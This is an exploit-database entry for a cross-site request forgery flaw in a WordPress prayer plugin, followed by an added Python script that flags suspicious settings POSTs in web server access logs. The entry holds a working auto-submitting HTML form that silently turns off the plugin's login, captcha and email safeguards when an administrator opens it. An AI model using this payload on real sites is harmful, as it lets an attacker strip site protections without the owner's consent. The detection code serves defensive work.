## https://sploitus.com/exploit?id=WPEX-ID:94F4CC45-4C55-43D4-8AD2-A20C118B589F
Have an admin open an HTML file containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/edit.php?post_type=prayers&page=pray-settings" method="post" enctype="multipart/form-data">
        <input type="hidden" name="upr_no_prayer_per_page" value="9999" />
        <input type="hidden" name="upr_login_not_required_request" value="0" />
        <input type="hidden" name="upr_prayer_send_email" value="0" />
        <input type="hidden" name="upr_prayer_send_admin_email" value="0" />
        <input type="hidden" name="upr_prayer_default_status_pending" value="0" />
        <input type="hidden" name="upr_prayer_hide_captcha" value="0" />
        <input type="hidden" name="sitekey_gc" value="0" />
        <input type="hidden" name="secret_gc" value="0" />
        <input type="hidden" name="upr_prayer_show_country" value="0" />
        <input type="hidden" name="upr_time_interval_pray_prayed_button" value="0" />
        <input type="hidden" name="upr_prayer_thankyou" value="CSRF" />
        <input type="hidden" name="upr_prayer_fetch_req_from" value="all" />
        <input type="hidden" name="prayerssettings" value="Update" />
        <input type="submit" value="submit">
    </form>
</body>
```
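A detection sketch for the request this form produces, added here as an example and not part of the original advisory or the plugin: it scans web server access logs for POSTs to the settings URL that were not referred from the site's own `/wp-admin/`. It assumes Combined Log Format and the hostname `example.com` from the form action; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

SITE_HOST = "example.com"  # assumption: the site's own hostname, as in the PoC

# Combined Log Format: ip - user [time] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

def is_settings_post(method, target):
    """True for a POST to the settings URL used as the PoC form action."""
    url = urlsplit(target)
    query = parse_qs(url.query)
    return (method == "POST"
            and url.path.endswith("/wp-admin/edit.php")
            and query.get("post_type") == ["prayers"]
            and query.get("page") == ["pray-settings"])

def suspicious_settings_posts(lines, site_host=SITE_HOST):
    """Return (time, ip, referer) for settings POSTs not referred from the site's own wp-admin."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or not is_settings_post(m["method"], m["target"]):
            continue
        ref = urlsplit(m["referer"])  # "-" or "" parses to hostname None
        if ref.hostname != site_host or not ref.path.startswith("/wp-admin/"):
            hits.append((m["time"], m["ip"], m["referer"]))
    return hits

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SETTINGS_URL = "/wp-admin/edit.php?post_type=prayers&page=pray-settings"
SAMPLE_LOG = [
    f'192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "POST {SETTINGS_URL} HTTP/1.1" 200 512 "https://example.com{SETTINGS_URL}" "Mozilla/5.0"',
    f'192.0.2.10 - - [01/Jan/2024:10:05:00 +0000] "POST {SETTINGS_URL} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    f'192.0.2.11 - - [01/Jan/2024:10:06:00 +0000] "POST {SETTINGS_URL} HTTP/1.1" 200 512 "https://other.example/page.html" "Mozilla/5.0"',
    f'192.0.2.12 - - [01/Jan/2024:10:07:00 +0000] "GET {SETTINGS_URL} HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_settings_posts(SAMPLE_LOG):
        print("review:", hit)
```

A strict Referrer-Policy or a privacy extension can strip the Referer from a legitimate save, so treat each hit as a lead to compare against the plugin's current settings rather than as proof.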